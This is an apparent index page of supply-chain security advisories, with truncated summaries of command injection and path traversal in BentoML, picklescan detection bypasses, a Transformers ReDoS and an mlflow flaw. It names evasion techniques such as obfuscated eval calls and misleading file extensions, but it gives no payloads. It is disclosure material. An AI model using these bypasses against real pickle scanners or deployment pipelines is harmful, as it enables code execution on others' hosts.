Supply Chain
32 entries
Every Supply Chain entry VulnWatch has indexed, sorted by publication date.
Subscribe to this tag's RSS feed
BentoML: Command Injection in cloud deployment setup script
Commit ce53491 (March 24) fixed command injection via `system_packages` in Dockerfile templates and `images.py` by adding `shlex.quote`. However, the cloud deployment path in `src/bentoml/_internal/cl...
BentoML has Dockerfile Command Injection via system_packages in bentofile.yaml
## Summary The `docker.system_packages` field in `bentofile.yaml` accepts arbitrary strings that are interpolated directly into Dockerfile `RUN` commands without sanitization. Since `system_packages`...
picklescan missing detection by simple obfuscation of a `builtins.eval` call
### Summary An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the host loading a pickle payload from an untrusted source. ### Details It's possibl...
BentoML has a Path Traversal via Bentofile Configuration
### Summary BentoML's `bentofile.yaml` configuration allows path traversal attacks through multiple file path fields (`description`, `docker.setup_script`, `docker.dockerfile_template`, `conda.enviro...
Picklescan Bypass is Possible via File Extension Mismatch
### Summary Picklescan can be bypassed, allowing the detection of malicious pickle files to fail, when a standard pickle file is given a PyTorch-related file extension (e.g., .bin). This occurs becaus...
Transformers vulnerable to ReDoS attack through its get_imports() function
A Regular Expression Denial of Service (ReDoS) vulnerability was discovered in the Hugging Face Transformers library, specifically in the `get_imports()` function within `dynamic_module_utils.py`. Thi...
Undefined Behavior in mlflow
A vulnerability in mlflow/mlflow version 2.11.1 allows attackers to create multiple models with the same name by exploiting URL encoding. This flaw can lead to Denial of Service (DoS) as an authentica...